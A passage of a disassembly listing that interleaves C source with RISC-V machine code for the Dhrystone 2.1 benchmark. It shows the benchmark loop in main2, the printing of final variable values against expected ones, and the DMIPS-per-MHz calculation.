Ch_2_Glob = 'B';
80000204: 04200713 li a4,66
80000208: 82e18a23 sb a4,-1996(gp) # 800034d4 <Ch_2_Glob>
} /* Proc_4 */
8000020c: 8082 ret
8000020e <Proc_5>:
Proc_5 () /* without parameters */
/*******/
/* executed once */
{
Ch_1_Glob = 'A';
8000020e: 04100713 li a4,65
80000212: 82e18aa3 sb a4,-1995(gp) # 800034d5 <Ch_1_Glob>
Bool_Glob = false;
80000216: 8201ac23 sw zero,-1992(gp) # 800034d8 <Bool_Glob>
} /* Proc_5 */
8000021a: 8082 ret
8000021c <main2>:
{
8000021c: 7135 addi sp,sp,-160
Next_Ptr_Glob = (Rec_Pointer) malloc (sizeof (Rec_Type));
8000021e: 03000513 li a0,48
{
80000222: cf06 sw ra,156(sp)
80000224: cd22 sw s0,152(sp)
80000226: dce2 sw s8,120(sp)
80000228: d6ee sw s11,108(sp)
8000022a: cb26 sw s1,148(sp)
8000022c: c94a sw s2,144(sp)
8000022e: c74e sw s3,140(sp)
80000230: c552 sw s4,136(sp)
80000232: c356 sw s5,132(sp)
80000234: c15a sw s6,128(sp)
80000236: dede sw s7,124(sp)
80000238: dae6 sw s9,116(sp)
8000023a: d8ea sw s10,112(sp)
Next_Ptr_Glob = (Rec_Pointer) malloc (sizeof (Rec_Type));
8000023c: 74e000ef jal ra,8000098a <malloc>
80000240: 84a1a023 sw a0,-1984(gp) # 800034e0 <Next_Ptr_Glob>
Ptr_Glob = (Rec_Pointer) malloc (sizeof (Rec_Type));
80000244: 03000513 li a0,48
80000248: 742000ef jal ra,8000098a <malloc>
Ptr_Glob->Ptr_Comp = Next_Ptr_Glob;
8000024c: 8401a783 lw a5,-1984(gp) # 800034e0 <Next_Ptr_Glob>
Ptr_Glob = (Rec_Pointer) malloc (sizeof (Rec_Type));
80000250: 84a1a223 sw a0,-1980(gp) # 800034e4 <Ptr_Glob>
Ptr_Glob->Ptr_Comp = Next_Ptr_Glob;
80000254: c11c sw a5,0(a0)
Ptr_Glob->variant.var_1.Enum_Comp = Ident_3;
80000256: 4789 li a5,2
80000258: c51c sw a5,8(a0)
strcpy (Ptr_Glob->variant.var_1.Str_Comp,
8000025a: 800035b7 lui a1,0x80003
Ptr_Glob->variant.var_1.Int_Comp = 40;
8000025e: 02800793 li a5,40
80000262: c55c sw a5,12(a0)
strcpy (Ptr_Glob->variant.var_1.Str_Comp,
80000264: 467d li a2,31
80000266: ce458593 addi a1,a1,-796 # 80002ce4 <_stack_start+0xffffc814>
Ptr_Glob->Discr = Ident_1;
8000026a: 00052223 sw zero,4(a0)
strcpy (Ptr_Glob->variant.var_1.Str_Comp,
8000026e: 0541 addi a0,a0,16
80000270: 01d000ef jal ra,80000a8c <memcpy>
strcpy (Str_1_Loc, "DHRYSTONE PROGRAM, 1'ST STRING");
80000274: 80003737 lui a4,0x80003
80000278: 24c70793 addi a5,a4,588 # 8000324c <_stack_start+0xffffcd7c>
8000027c: 24c72e03 lw t3,588(a4)
80000280: 0047a303 lw t1,4(a5)
80000284: 0087a883 lw a7,8(a5)
80000288: 00c7a803 lw a6,12(a5)
8000028c: 4b8c lw a1,16(a5)
8000028e: 4bd0 lw a2,20(a5)
80000290: 4f94 lw a3,24(a5)
80000292: 01c7d703 lhu a4,28(a5)
80000296: 01e7c783 lbu a5,30(a5)
Arr_2_Glob [8][7] = 10;
8000029a: 80003db7 lui s11,0x80003
strcpy (Str_1_Loc, "DHRYSTONE PROGRAM, 1'ST STRING");
8000029e: 02e11e23 sh a4,60(sp)
800002a2: 02f10f23 sb a5,62(sp)
Arr_2_Glob [8][7] = 10;
800002a6: 5b4d8713 addi a4,s11,1460 # 800035b4 <_stack_start+0xffffd0e4>
800002aa: 47a9 li a5,10
printf ("\n");
800002ac: 4529 li a0,10
Arr_2_Glob [8][7] = 10;
800002ae: 64f72e23 sw a5,1628(a4)
strcpy (Str_1_Loc, "DHRYSTONE PROGRAM, 1'ST STRING");
800002b2: d072 sw t3,32(sp)
800002b4: d21a sw t1,36(sp)
800002b6: d446 sw a7,40(sp)
800002b8: d642 sw a6,44(sp)
800002ba: d82e sw a1,48(sp)
800002bc: da32 sw a2,52(sp)
800002be: dc36 sw a3,56(sp)
printf ("\n");
800002c0: 7b8000ef jal ra,80000a78 <putchar>
printf ("Dhrystone Benchmark, Version 2.1 (Language: C)\n");
800002c4: 80003537 lui a0,0x80003
800002c8: d0450513 addi a0,a0,-764 # 80002d04 <_stack_start+0xffffc834>
800002cc: 786000ef jal ra,80000a52 <puts>
printf ("\n");
800002d0: 4529 li a0,10
800002d2: 7a6000ef jal ra,80000a78 <putchar>
if (Reg)
800002d6: 8301a783 lw a5,-2000(gp) # 800034d0 <Reg>
800002da: 4c078663 beqz a5,800007a6 <main2+0x58a>
printf ("Program compiled with 'register' attribute\n");
800002de: 80003537 lui a0,0x80003
800002e2: d3450513 addi a0,a0,-716 # 80002d34 <_stack_start+0xffffc864>
800002e6: 76c000ef jal ra,80000a52 <puts>
printf ("\n");
800002ea: 4529 li a0,10
800002ec: 78c000ef jal ra,80000a78 <putchar>
printf ("Please give the number of runs through the benchmark: ");
800002f0: 80003537 lui a0,0x80003
800002f4: d9050513 addi a0,a0,-624 # 80002d90 <_stack_start+0xffffc8c0>
800002f8: 6b4000ef jal ra,800009ac <printf>
printf ("\n");
800002fc: 4529 li a0,10
800002fe: 77a000ef jal ra,80000a78 <putchar>
printf ("Execution starts, %d runs through Dhrystone\n", Number_Of_Runs);
80000302: 80003537 lui a0,0x80003
80000306: 0c800593 li a1,200
8000030a: dc850513 addi a0,a0,-568 # 80002dc8 <_stack_start+0xffffc8f8>
8000030e: 69e000ef jal ra,800009ac <printf>
Begin_Time = clock();
80000312: 770000ef jal ra,80000a82 <clock>
80000316: 80003437 lui s0,0x80003
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 2'ND STRING");
8000031a: 26c42783 lw a5,620(s0) # 8000326c <_stack_start+0xffffcd9c>
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 3'RD STRING");
8000031e: 80003d37 lui s10,0x80003
80000322: 28cd2b83 lw s7,652(s10) # 8000328c <_stack_start+0xffffcdbc>
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 2'ND STRING");
80000326: c43e sw a5,8(sp)
Begin_Time = clock();
80000328: 82a1a623 sw a0,-2004(gp) # 800034cc <Begin_Time>
for (Run_Index = 1; Run_Index <= Number_Of_Runs; ++Run_Index)
8000032c: 4985 li s3,1
8000032e: 26c40413 addi s0,s0,620
Int_1_Loc = 2;
80000332: 4489 li s1,2
Proc_5();
80000334: 3de9 jal 8000020e <Proc_5>
Proc_4();
80000336: 3d65 jal 800001ee <Proc_4>
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 2'ND STRING");
80000338: 01e44783 lbu a5,30(s0)
8000033c: 4850 lw a2,20(s0)
8000033e: 00442e03 lw t3,4(s0)
80000342: 00842303 lw t1,8(s0)
80000346: 00c42883 lw a7,12(s0)
8000034a: 01042803 lw a6,16(s0)
8000034e: 4c14 lw a3,24(s0)
80000350: 01c45703 lhu a4,28(s0)
80000354: 4ea2 lw t4,8(sp)
80000356: 04f10f23 sb a5,94(sp)
Bool_Glob = ! Func_2 (Str_1_Loc, Str_2_Loc);
8000035a: 008c addi a1,sp,64
Enum_Loc = Ident_2;
8000035c: 4785 li a5,1
Bool_Glob = ! Func_2 (Str_1_Loc, Str_2_Loc);
8000035e: 1008 addi a0,sp,32
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 2'ND STRING");
80000360: cab2 sw a2,84(sp)
Enum_Loc = Ident_2;
80000362: ce3e sw a5,28(sp)
Int_1_Loc = 2;
80000364: ca26 sw s1,20(sp)
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 2'ND STRING");
80000366: c0f6 sw t4,64(sp)
80000368: c2f2 sw t3,68(sp)
8000036a: c49a sw t1,72(sp)
8000036c: c6c6 sw a7,76(sp)
8000036e: c8c2 sw a6,80(sp)
80000370: ccb6 sw a3,88(sp)
80000372: 04e11e23 sh a4,92(sp)
Bool_Glob = ! Func_2 (Str_1_Loc, Str_2_Loc);
80000376: 21dd jal 8000085c <Func_2>
while (Int_1_Loc < Int_2_Loc) /* loop body executed once */
80000378: 4652 lw a2,20(sp)
Bool_Glob = ! Func_2 (Str_1_Loc, Str_2_Loc);
8000037a: 00153513 seqz a0,a0
8000037e: 82a1ac23 sw a0,-1992(gp) # 800034d8 <Bool_Glob>
while (Int_1_Loc < Int_2_Loc) /* loop body executed once */
80000382: 02c4c063 blt s1,a2,800003a2 <main2+0x186>
Int_3_Loc = 5 * Int_1_Loc - Int_2_Loc;
80000386: 00261793 slli a5,a2,0x2
8000038a: 97b2 add a5,a5,a2
8000038c: 17f5 addi a5,a5,-3
Proc_7 (Int_1_Loc, Int_2_Loc, &Int_3_Loc);
8000038e: 8532 mv a0,a2
80000390: 458d li a1,3
80000392: 0830 addi a2,sp,24
Int_3_Loc = 5 * Int_1_Loc - Int_2_Loc;
80000394: cc3e sw a5,24(sp)
Proc_7 (Int_1_Loc, Int_2_Loc, &Int_3_Loc);
80000396: 2189 jal 800007d8 <Proc_7>
Int_1_Loc += 1;
80000398: 4652 lw a2,20(sp)
8000039a: 0605 addi a2,a2,1
8000039c: ca32 sw a2,20(sp)
while (Int_1_Loc < Int_2_Loc) /* loop body executed once */
8000039e: fec4d4e3 ble a2,s1,80000386 <main2+0x16a>
Proc_8 (Arr_1_Glob, Arr_2_Glob, Int_1_Loc, Int_3_Loc);
800003a2: 46e2 lw a3,24(sp)
800003a4: 84c18513 addi a0,gp,-1972 # 800034ec <Arr_1_Glob>
800003a8: 5b4d8593 addi a1,s11,1460
800003ac: 2915 jal 800007e0 <Proc_8>
Proc_1 (Ptr_Glob);
800003ae: 8441a503 lw a0,-1980(gp) # 800034e4 <Ptr_Glob>
for (Ch_Index = 'A'; Ch_Index <= Ch_2_Glob; ++Ch_Index)
800003b2: 04100a93 li s5,65
Int_2_Loc = 3;
800003b6: 4a0d li s4,3
Proc_1 (Ptr_Glob);
800003b8: 33b1 jal 80000104 <Proc_1>
for (Ch_Index = 'A'; Ch_Index <= Ch_2_Glob; ++Ch_Index)
800003ba: 8341c703 lbu a4,-1996(gp) # 800034d4 <Ch_2_Glob>
800003be: 04000793 li a5,64
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 3'RD STRING");
800003c2: 28cd0c93 addi s9,s10,652
for (Ch_Index = 'A'; Ch_Index <= Ch_2_Glob; ++Ch_Index)
800003c6: 02e7f163 bleu a4,a5,800003e8 <main2+0x1cc>
if (Enum_Loc == Func_1 (Ch_Index, 'C'))
800003ca: 8556 mv a0,s5
800003cc: 04300593 li a1,67
800003d0: 2995 jal 80000844 <Func_1>
800003d2: 47f2 lw a5,28(sp)
for (Ch_Index = 'A'; Ch_Index <= Ch_2_Glob; ++Ch_Index)
800003d4: 001a8713 addi a4,s5,1
if (Enum_Loc == Func_1 (Ch_Index, 'C'))
800003d8: 36f50e63 beq a0,a5,80000754 <main2+0x538>
for (Ch_Index = 'A'; Ch_Index <= Ch_2_Glob; ++Ch_Index)
800003dc: 8341c783 lbu a5,-1996(gp) # 800034d4 <Ch_2_Glob>
800003e0: 0ff77a93 andi s5,a4,255
800003e4: ff57f3e3 bleu s5,a5,800003ca <main2+0x1ae>
Int_2_Loc = Int_2_Loc * Int_1_Loc;
800003e8: 45d2 lw a1,20(sp)
800003ea: 8552 mv a0,s4
for (Run_Index = 1; Run_Index <= Number_Of_Runs; ++Run_Index)
800003ec: 0985 addi s3,s3,1
Int_2_Loc = Int_2_Loc * Int_1_Loc;
800003ee: 7ba020ef jal ra,80002ba8 <__mulsi3>
Int_1_Loc = Int_2_Loc / Int_3_Loc;
800003f2: 4ae2 lw s5,24(sp)
Int_2_Loc = Int_2_Loc * Int_1_Loc;
800003f4: c62a sw a0,12(sp)
Int_1_Loc = Int_2_Loc / Int_3_Loc;
800003f6: 85d6 mv a1,s5
800003f8: 7d4020ef jal ra,80002bcc <__divsi3>
800003fc: 8a2a mv s4,a0
Proc_2 (&Int_1_Loc);
800003fe: 0848 addi a0,sp,20
Int_1_Loc = Int_2_Loc / Int_3_Loc;
80000400: ca52 sw s4,20(sp)
Proc_2 (&Int_1_Loc);
80000402: 31f1 jal 800000ce <Proc_2>
for (Run_Index = 1; Run_Index <= Number_Of_Runs; ++Run_Index)
80000404: 0c900793 li a5,201
80000408: f2f996e3 bne s3,a5,80000334 <main2+0x118>
End_Time = clock();
8000040c: 676000ef jal ra,80000a82 <clock>
80000410: 82a1a423 sw a0,-2008(gp) # 800034c8 <End_Time>
printf ("Execution ends\n");
80000414: 80003537 lui a0,0x80003
80000418: df850513 addi a0,a0,-520 # 80002df8 <_stack_start+0xffffc928>
8000041c: 636000ef jal ra,80000a52 <puts>
printf ("\n");
80000420: 4529 li a0,10
80000422: 656000ef jal ra,80000a78 <putchar>
printf ("Final values of the variables used in the benchmark:\n");
80000426: 80003537 lui a0,0x80003
8000042a: e0850513 addi a0,a0,-504 # 80002e08 <_stack_start+0xffffc938>
8000042e: 624000ef jal ra,80000a52 <puts>
printf ("\n");
80000432: 4529 li a0,10
80000434: 644000ef jal ra,80000a78 <putchar>
printf ("Int_Glob: %d\n", Int_Glob);
80000438: 83c1a583 lw a1,-1988(gp) # 800034dc <Int_Glob>
8000043c: 80003537 lui a0,0x80003
80000440: e4050513 addi a0,a0,-448 # 80002e40 <_stack_start+0xffffc970>
printf (" should be: %d\n", 5);
80000444: 80003437 lui s0,0x80003
printf ("Int_Glob: %d\n", Int_Glob);
80000448: 564000ef jal ra,800009ac <printf>
printf (" should be: %d\n", 5);
8000044c: 4595 li a1,5
8000044e: e5c40513 addi a0,s0,-420 # 80002e5c <_stack_start+0xffffc98c>
80000452: 55a000ef jal ra,800009ac <printf>
printf ("Bool_Glob: %d\n", Bool_Glob);
80000456: 8381a583 lw a1,-1992(gp) # 800034d8 <Bool_Glob>
8000045a: 80003537 lui a0,0x80003
8000045e: e7850513 addi a0,a0,-392 # 80002e78 <_stack_start+0xffffc9a8>
80000462: 54a000ef jal ra,800009ac <printf>
printf (" should be: %d\n", 1);
80000466: 4585 li a1,1
80000468: e5c40513 addi a0,s0,-420
8000046c: 540000ef jal ra,800009ac <printf>
printf ("Ch_1_Glob: %c\n", Ch_1_Glob);
80000470: 8351c583 lbu a1,-1995(gp) # 800034d5 <Ch_1_Glob>
80000474: 80003537 lui a0,0x80003
80000478: e9450513 addi a0,a0,-364 # 80002e94 <_stack_start+0xffffc9c4>
8000047c: 2b05 jal 800009ac <printf>
printf (" should be: %c\n", 'A');
8000047e: 800034b7 lui s1,0x80003
80000482: 04100593 li a1,65
80000486: eb048513 addi a0,s1,-336 # 80002eb0 <_stack_start+0xffffc9e0>
8000048a: 230d jal 800009ac <printf>
printf ("Ch_2_Glob: %c\n", Ch_2_Glob);
8000048c: 8341c583 lbu a1,-1996(gp) # 800034d4 <Ch_2_Glob>
80000490: 80003537 lui a0,0x80003
80000494: ecc50513 addi a0,a0,-308 # 80002ecc <_stack_start+0xffffc9fc>
80000498: 2b11 jal 800009ac <printf>
printf (" should be: %c\n", 'B');
8000049a: 04200593 li a1,66
8000049e: eb048513 addi a0,s1,-336
800004a2: 2329 jal 800009ac <printf>
printf ("Arr_1_Glob[8]: %d\n", Arr_1_Glob[8]);
800004a4: 84c18793 addi a5,gp,-1972 # 800034ec <Arr_1_Glob>
800004a8: 538c lw a1,32(a5)
800004aa: 80003537 lui a0,0x80003
800004ae: ee850513 addi a0,a0,-280 # 80002ee8 <_stack_start+0xffffca18>
800004b2: 29ed jal 800009ac <printf>
printf (" should be: %d\n", 7);
800004b4: 459d li a1,7
800004b6: e5c40513 addi a0,s0,-420
800004ba: 29cd jal 800009ac <printf>
printf ("Arr_2_Glob[8][7]: %d\n", Arr_2_Glob[8][7]);
800004bc: 800037b7 lui a5,0x80003
800004c0: 5b478793 addi a5,a5,1460 # 800035b4 <_stack_start+0xffffd0e4>
800004c4: 65c7a583 lw a1,1628(a5)
800004c8: 80003537 lui a0,0x80003
800004cc: f0450513 addi a0,a0,-252 # 80002f04 <_stack_start+0xffffca34>
800004d0: 29f1 jal 800009ac <printf>
printf (" should be: Number_Of_Runs + 10\n");
800004d2: 80003537 lui a0,0x80003
800004d6: f2050513 addi a0,a0,-224 # 80002f20 <_stack_start+0xffffca50>
800004da: 578000ef jal ra,80000a52 <puts>
printf ("Ptr_Glob->\n");
800004de: 80003537 lui a0,0x80003
800004e2: f4c50513 addi a0,a0,-180 # 80002f4c <_stack_start+0xffffca7c>
800004e6: 56c000ef jal ra,80000a52 <puts>
printf (" Ptr_Comp: %d\n", (int) Ptr_Glob->Ptr_Comp);
800004ea: 8441a783 lw a5,-1980(gp) # 800034e4 <Ptr_Glob>
800004ee: 80003db7 lui s11,0x80003
800004f2: f58d8513 addi a0,s11,-168 # 80002f58 <_stack_start+0xffffca88>
800004f6: 438c lw a1,0(a5)
printf (" Discr: %d\n", Ptr_Glob->Discr);
800004f8: 80003cb7 lui s9,0x80003
printf (" Enum_Comp: %d\n", Ptr_Glob->variant.var_1.Enum_Comp);
800004fc: 80003bb7 lui s7,0x80003
printf (" Ptr_Comp: %d\n", (int) Ptr_Glob->Ptr_Comp);
80000500: 2175 jal 800009ac <printf>
printf (" should be: (implementation-dependent)\n");
80000502: 80003537 lui a0,0x80003
80000506: f7450513 addi a0,a0,-140 # 80002f74 <_stack_start+0xffffcaa4>
8000050a: 548000ef jal ra,80000a52 <puts>
printf (" Discr: %d\n", Ptr_Glob->Discr);
8000050e: 8441a783 lw a5,-1980(gp) # 800034e4 <Ptr_Glob>
80000512: fa4c8513 addi a0,s9,-92 # 80002fa4 <_stack_start+0xffffcad4>
printf (" Int_Comp: %d\n", Ptr_Glob->variant.var_1.Int_Comp);
80000516: 80003b37 lui s6,0x80003
printf (" Discr: %d\n", Ptr_Glob->Discr);
8000051a: 43cc lw a1,4(a5)
printf (" Str_Comp: %s\n", Ptr_Glob->variant.var_1.Str_Comp);
8000051c: 800039b7 lui s3,0x80003
printf (" should be: DHRYSTONE PROGRAM, SOME STRING\n");
80000520: 80003937 lui s2,0x80003
printf (" Discr: %d\n", Ptr_Glob->Discr);
80000524: 2161 jal 800009ac <printf>
printf (" should be: %d\n", 0);
80000526: 4581 li a1,0
80000528: e5c40513 addi a0,s0,-420
8000052c: 2141 jal 800009ac <printf>
printf (" Enum_Comp: %d\n", Ptr_Glob->variant.var_1.Enum_Comp);
8000052e: 8441a783 lw a5,-1980(gp) # 800034e4 <Ptr_Glob>
80000532: fc0b8513 addi a0,s7,-64 # 80002fc0 <_stack_start+0xffffcaf0>
80000536: 478c lw a1,8(a5)
80000538: 2995 jal 800009ac <printf>
printf (" should be: %d\n", 2);
8000053a: 4589 li a1,2
8000053c: e5c40513 addi a0,s0,-420
80000540: 21b5 jal 800009ac <printf>
printf (" Int_Comp: %d\n", Ptr_Glob->variant.var_1.Int_Comp);
80000542: 8441a783 lw a5,-1980(gp) # 800034e4 <Ptr_Glob>
80000546: fdcb0513 addi a0,s6,-36 # 80002fdc <_stack_start+0xffffcb0c>
8000054a: 47cc lw a1,12(a5)
8000054c: 2185 jal 800009ac <printf>
printf (" should be: %d\n", 17);
8000054e: 45c5 li a1,17
80000550: e5c40513 addi a0,s0,-420
80000554: 29a1 jal 800009ac <printf>
printf (" Str_Comp: %s\n", Ptr_Glob->variant.var_1.Str_Comp);
80000556: 8441a583 lw a1,-1980(gp) # 800034e4 <Ptr_Glob>
8000055a: ff898513 addi a0,s3,-8 # 80002ff8 <_stack_start+0xffffcb28>
8000055e: 05c1 addi a1,a1,16
80000560: 21b1 jal 800009ac <printf>
printf (" should be: DHRYSTONE PROGRAM, SOME STRING\n");
80000562: 01490513 addi a0,s2,20 # 80003014 <_stack_start+0xffffcb44>
80000566: 21f5 jal 80000a52 <puts>
printf ("Next_Ptr_Glob->\n");
80000568: 80003537 lui a0,0x80003
8000056c: 04850513 addi a0,a0,72 # 80003048 <_stack_start+0xffffcb78>
80000570: 21cd jal 80000a52 <puts>
printf (" Ptr_Comp: %d\n", (int) Next_Ptr_Glob->Ptr_Comp);
80000572: 8401a783 lw a5,-1984(gp) # 800034e0 <Next_Ptr_Glob>
80000576: f58d8513 addi a0,s11,-168
8000057a: 438c lw a1,0(a5)
8000057c: 2905 jal 800009ac <printf>
printf (" should be: (implementation-dependent), same as above\n");
8000057e: 80003537 lui a0,0x80003
80000582: 05850513 addi a0,a0,88 # 80003058 <_stack_start+0xffffcb88>
80000586: 21f1 jal 80000a52 <puts>
printf (" Discr: %d\n", Next_Ptr_Glob->Discr);
80000588: 8401a783 lw a5,-1984(gp) # 800034e0 <Next_Ptr_Glob>
8000058c: fa4c8513 addi a0,s9,-92
80000590: 43cc lw a1,4(a5)
80000592: 2929 jal 800009ac <printf>
printf (" should be: %d\n", 0);
80000594: 4581 li a1,0
80000596: e5c40513 addi a0,s0,-420
8000059a: 2909 jal 800009ac <printf>
printf (" Enum_Comp: %d\n", Next_Ptr_Glob->variant.var_1.Enum_Comp);
8000059c: 8401a783 lw a5,-1984(gp) # 800034e0 <Next_Ptr_Glob>
800005a0: fc0b8513 addi a0,s7,-64
800005a4: 478c lw a1,8(a5)
800005a6: 2119 jal 800009ac <printf>
printf (" should be: %d\n", 1);
800005a8: 4585 li a1,1
800005aa: e5c40513 addi a0,s0,-420
800005ae: 2efd jal 800009ac <printf>
printf (" Int_Comp: %d\n", Next_Ptr_Glob->variant.var_1.Int_Comp);
800005b0: 8401a783 lw a5,-1984(gp) # 800034e0 <Next_Ptr_Glob>
800005b4: fdcb0513 addi a0,s6,-36
800005b8: 47cc lw a1,12(a5)
800005ba: 2ecd jal 800009ac <printf>
printf (" should be: %d\n", 18);
800005bc: 45c9 li a1,18
800005be: e5c40513 addi a0,s0,-420
800005c2: 26ed jal 800009ac <printf>
printf (" Str_Comp: %s\n",
800005c4: 8401a583 lw a1,-1984(gp) # 800034e0 <Next_Ptr_Glob>
800005c8: ff898513 addi a0,s3,-8
800005cc: 05c1 addi a1,a1,16
800005ce: 2ef9 jal 800009ac <printf>
printf (" should be: DHRYSTONE PROGRAM, SOME STRING\n");
800005d0: 01490513 addi a0,s2,20
800005d4: 29bd jal 80000a52 <puts>
printf ("Int_1_Loc: %d\n", Int_1_Loc);
800005d6: 45d2 lw a1,20(sp)
800005d8: 80003537 lui a0,0x80003
800005dc: 09850513 addi a0,a0,152 # 80003098 <_stack_start+0xffffcbc8>
800005e0: 26f1 jal 800009ac <printf>
printf (" should be: %d\n", 5);
800005e2: 4595 li a1,5
800005e4: e5c40513 addi a0,s0,-420
800005e8: 26d1 jal 800009ac <printf>
Int_2_Loc = 7 * (Int_2_Loc - Int_3_Loc) - Int_1_Loc;
800005ea: 47b2 lw a5,12(sp)
printf ("Int_2_Loc: %d\n", Int_2_Loc);
800005ec: 80003537 lui a0,0x80003
800005f0: 0b450513 addi a0,a0,180 # 800030b4 <_stack_start+0xffffcbe4>
Int_2_Loc = 7 * (Int_2_Loc - Int_3_Loc) - Int_1_Loc;
800005f4: 41578ab3 sub s5,a5,s5
800005f8: 003a9793 slli a5,s5,0x3
800005fc: 41578ab3 sub s5,a5,s5
printf ("Int_2_Loc: %d\n", Int_2_Loc);
80000600: 414a85b3 sub a1,s5,s4
80000604: 2665 jal 800009ac <printf>
printf (" should be: %d\n", 13);
80000606: 45b5 li a1,13
80000608: e5c40513 addi a0,s0,-420
8000060c: 2645 jal 800009ac <printf>
printf ("Int_3_Loc: %d\n", Int_3_Loc);
8000060e: 45e2 lw a1,24(sp)
80000610: 80003537 lui a0,0x80003
80000614: 0d050513 addi a0,a0,208 # 800030d0 <_stack_start+0xffffcc00>
80000618: 2e51 jal 800009ac <printf>
printf (" should be: %d\n", 7);
8000061a: 459d li a1,7
8000061c: e5c40513 addi a0,s0,-420
80000620: 2671 jal 800009ac <printf>
printf ("Enum_Loc: %d\n", Enum_Loc);
80000622: 45f2 lw a1,28(sp)
80000624: 80003537 lui a0,0x80003
80000628: 0ec50513 addi a0,a0,236 # 800030ec <_stack_start+0xffffcc1c>
8000062c: 2641 jal 800009ac <printf>
printf (" should be: %d\n", 1);
8000062e: 4585 li a1,1
80000630: e5c40513 addi a0,s0,-420
80000634: 2ea5 jal 800009ac <printf>
printf ("Str_1_Loc: %s\n", Str_1_Loc);
80000636: 80003537 lui a0,0x80003
8000063a: 100c addi a1,sp,32
8000063c: 10850513 addi a0,a0,264 # 80003108 <_stack_start+0xffffcc38>
80000640: 26b5 jal 800009ac <printf>
printf (" should be: DHRYSTONE PROGRAM, 1'ST STRING\n");
80000642: 80003537 lui a0,0x80003
80000646: 12450513 addi a0,a0,292 # 80003124 <_stack_start+0xffffcc54>
8000064a: 2121 jal 80000a52 <puts>
printf ("Str_2_Loc: %s\n", Str_2_Loc);
8000064c: 80003537 lui a0,0x80003
80000650: 008c addi a1,sp,64
80000652: 15850513 addi a0,a0,344 # 80003158 <_stack_start+0xffffcc88>
80000656: 2e99 jal 800009ac <printf>
printf (" should be: DHRYSTONE PROGRAM, 2'ND STRING\n");
80000658: 80003537 lui a0,0x80003
8000065c: 17450513 addi a0,a0,372 # 80003174 <_stack_start+0xffffcca4>
80000660: 2ecd jal 80000a52 <puts>
printf ("\n");
80000662: 4529 li a0,10
80000664: 2911 jal 80000a78 <putchar>
User_Time = End_Time - Begin_Time;
80000666: 82c1a703 lw a4,-2004(gp) # 800034cc <Begin_Time>
8000066a: 8281a583 lw a1,-2008(gp) # 800034c8 <End_Time>
if (User_Time < Too_Small_Time)
8000066e: 1f300793 li a5,499
User_Time = End_Time - Begin_Time;
80000672: 8d99 sub a1,a1,a4
80000674: 82b1a223 sw a1,-2012(gp) # 800034c4 <User_Time>
if (User_Time < Too_Small_Time)
80000678: 12b7df63 ble a1,a5,800007b6 <main2+0x59a>
printf ("Clock cycles=%d \n", User_Time);
8000067c: 80003537 lui a0,0x80003
80000680: 20050513 addi a0,a0,512 # 80003200 <_stack_start+0xffffcd30>
80000684: 2625 jal 800009ac <printf>
Microseconds = (float) User_Time * Mic_secs_Per_Second
80000686: 8241a503 lw a0,-2012(gp) # 800034c4 <User_Time>
8000068a: 156020ef jal ra,800027e0 <__floatsisf>
8000068e: 842a mv s0,a0
80000690: 274020ef jal ra,80002904 <__extendsfdf2>
80000694: 800037b7 lui a5,0x80003
80000698: 4a07a603 lw a2,1184(a5) # 800034a0 <_stack_start+0xffffcfd0>
8000069c: 4a47a683 lw a3,1188(a5)
800006a0: 661000ef jal ra,80001500 <__muldf3>
/ ((float) CORE_HZ * ((float) Number_Of_Runs));
800006a4: 800037b7 lui a5,0x80003
800006a8: 4a87a603 lw a2,1192(a5) # 800034a8 <_stack_start+0xffffcfd8>
800006ac: 4ac7a683 lw a3,1196(a5)
800006b0: 640000ef jal ra,80000cf0 <__divdf3>
800006b4: 35c020ef jal ra,80002a10 <__truncdfsf2>
800006b8: 82a1a023 sw a0,-2016(gp) # 800034c0 <Microseconds>
/ (float) User_Time;
800006bc: 800037b7 lui a5,0x80003
800006c0: 4b07a503 lw a0,1200(a5) # 800034b0 <_stack_start+0xffffcfe0>
800006c4: 85a2 mv a1,s0
800006c6: 52a010ef jal ra,80001bf0 <__divsf3>
Dhrystones_Per_Second = ((float) CORE_HZ * (float) Number_Of_Runs)
800006ca: 80a1ae23 sw a0,-2020(gp) # 800034bc <Dhrystones_Per_Second>
printf ("DMIPS per Mhz: ");
800006ce: 80003537 lui a0,0x80003
800006d2: 21450513 addi a0,a0,532 # 80003214 <_stack_start+0xffffcd44>
800006d6: 2cd9 jal 800009ac <printf>
float dmips = (1e6f/1757.0f) * Number_Of_Runs / User_Time;
800006d8: 8241a503 lw a0,-2012(gp) # 800034c4 <User_Time>
800006dc: 104020ef jal ra,800027e0 <__floatsisf>
800006e0: 800037b7 lui a5,0x80003
800006e4: 85aa mv a1,a0
800006e6: 4b47a503 lw a0,1204(a5) # 800034b4 <_stack_start+0xffffcfe4>
800006ea: 506010ef jal ra,80001bf0 <__divsf3>
800006ee: 842a mv s0,a0
int dmipsNatural = dmips;
800006f0: 080020ef jal ra,80002770 <__fixsfsi>
800006f4: 84aa mv s1,a0
int dmipsReal = (dmips - dmipsNatural)*100.0f;
800006f6: 0ea020ef jal ra,800027e0 <__floatsisf>
800006fa: 85aa mv a1,a0
800006fc: 8522 mv a0,s0
800006fe: 3fb010ef jal ra,800022f8 <__subsf3>
80000702: 800037b7 lui a5,0x80003
80000706: 4b87a583 lw a1,1208(a5) # 800034b8 <_stack_start+0xffffcfe8>
8000070a: 07f010ef jal ra,80001f88 <__mulsf3>
8000070e: 062020ef jal ra,80002770 <__fixsfsi>
80000712: 842a mv s0,a0
printf ("%d.", dmipsNatural);
80000714: 80003537 lui a0,0x80003
80000718: 85a6 mv a1,s1
8000071a: 24450513 addi a0,a0,580 # 80003244 <_stack_start+0xffffcd74>
8000071e: 2479 jal 800009ac <printf>
if(dmipsReal < 10) printf("0");
80000720: 47a5 li a5,9
80000722: 0a87d763 ble s0,a5,800007d0 <main2+0x5b4>
printf ("%d", dmipsReal);
80000726: 80003537 lui a0,0x80003
8000072a: 85a2 mv a1,s0
8000072c: 24850513 addi a0,a0,584 # 80003248 <_stack_start+0xffffcd78>
80000730: 2cb5 jal 800009ac <printf>
printf ("\n");
80000732: 4529 li a0,10
80000734: 2691 jal 80000a78 <putchar>
}
80000736: 40fa lw ra,156(sp)
80000738: 446a lw s0,152(sp)
8000073a: 44da lw s1,148(sp)
8000073c: 494a lw s2,144(sp)
8000073e: 49ba lw s3,140(sp)
80000740: 4a2a lw s4,136(sp)
